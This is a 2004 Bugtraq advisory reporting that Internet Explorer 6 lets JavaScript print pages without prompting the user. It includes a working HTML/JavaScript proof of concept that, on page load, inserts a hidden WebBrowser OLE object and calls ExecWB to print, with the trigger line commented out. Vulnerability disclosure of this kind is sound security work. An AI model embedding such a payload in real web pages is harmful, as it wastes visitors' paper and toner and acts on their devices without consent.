Bugtraq mailing list archives
IE 6 Print Without Prompt
From: Ben Garvey <bengarvey () comcast net>
Date: Mon, 12 Apr 2004 10:45:20 -0400
####################################################################### Ben Garvey Application: Microsoft Internet Explorer Versions: 6.0 Platforms: WindowsBugs: IE 6 allows JavaScript to send documents to the printer without prompting the user.
Exploitation: Client Date: 12 April 2004 Author: Ben Garvey bengarvey () comcast net http://www.bengarvey.com Bugtraq report format: Thanks Luigi Auriemma! ####################################################################### =============== 1) Introduction =============== Microsoft Internet Explorer is the dominant web browser on the world's PCs. Any exploits or bugs found hurt millions of users. Like anyone here needed to know that or is surprised. ####################################################################### =============== 2) Bug summary =============== Using an OLE object, JavaScript, and HTML, IE 6 will allow a malicious document to send pages to the printer without prompting the user. Printing documents without prompting the user could result in the waste of paper, toner, ink or result in damage to the printer. If inserted into a high traffic website this waste could be substantial.$ of paper x printed sheets x web traffic x % of IE Users = $total waste in paper
If paper costs a penny per sheet ($5 for 500 sheets)We average about 10 sheets printed per user before they realize what's happening (conservative estimate)
It's used on a high traffic website (1 million unique visitors) IE's market share is about 90%. $0.01 x 10 per user x 1 million x 0.90 = $90,000 in damages This doesn't even include costs associated with toner and time. =============== 3) Exploit ===============The following is an example of the exploit. The offending line must be uncommented to activate it. Remove any linebreaks that break the JavaScript.
<HTML> <HEAD> <SCRIPT language="JavaScript"> function ieExecWB( intOLEcmd, intOLEparam ) { // Create OLE Objectvar WebBrowser = '<OBJECT ID="WebBrowser1" WIDTH=0 HEIGHT=0 CLASSID="CLSID:8856F961-340A-11D0-A96B-00C04FD705A2"></OBJECT>';
// Place Object on page document.body.insertAdjacentHTML('beforeEnd', WebBrowser); // if intOLEparam is not defined, set itif ( ( ! intOLEparam ) || ( intOLEparam < -1 ) || ( intOLEparam > 1) )
intOLEparam = 1; // Execute Object WebBrowser1.ExecWB( intOLEcmd, intOLEparam ); // Destroy Object WebBrowser1.outerHTML = ""; } function printAll() { // Uncomment this to enable the exploit! //ieExecWB(6,-1); } </SCRIPT> </HEAD> <BODY onload="printAll()"> <h3>I like your PRINTER</h3> </BODY> </HTML> =============== 4) Conclusion ===============I can't think of any reasonable use for allowing IE to print stuff without my permission.
This bug should be fixed as soon as possible. ----- Ben Garvey bengarvey () comcast net http://www.bengarvey.com
Current thread:
- IE 6 Print Without Prompt Ben Garvey (Apr 12)